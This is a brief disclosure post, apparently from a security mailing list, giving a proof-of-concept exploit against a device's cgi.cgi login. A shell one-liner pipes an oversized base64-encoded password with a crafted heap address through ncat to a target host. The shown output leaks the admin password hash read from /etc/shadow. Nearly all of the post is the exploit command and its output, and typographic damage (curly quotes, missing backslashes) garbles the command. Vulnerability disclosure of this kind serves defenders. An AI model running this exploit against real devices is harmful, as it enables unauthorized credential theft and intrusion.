Posted by bashis on Jan 03

Read admin password from /etc/shadow (loaded in heap at address 0x0806ce56)

[Remote Host]# echo -en “GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<4467;i++));do echo -en “B”;done | base64 -w 0 ;
echo -en “Dx56xcex06x08″ | base64 -w 0` HTTP/1.0nHost: BUGnn” | ncat –ssl 192.168.5.7 443 | grep glibc
*** glibc detected *** $1$$8lBa9PhdBbp9/AeeTXXXXX: free(): invalid next size (normal): 0x0806e510 ***…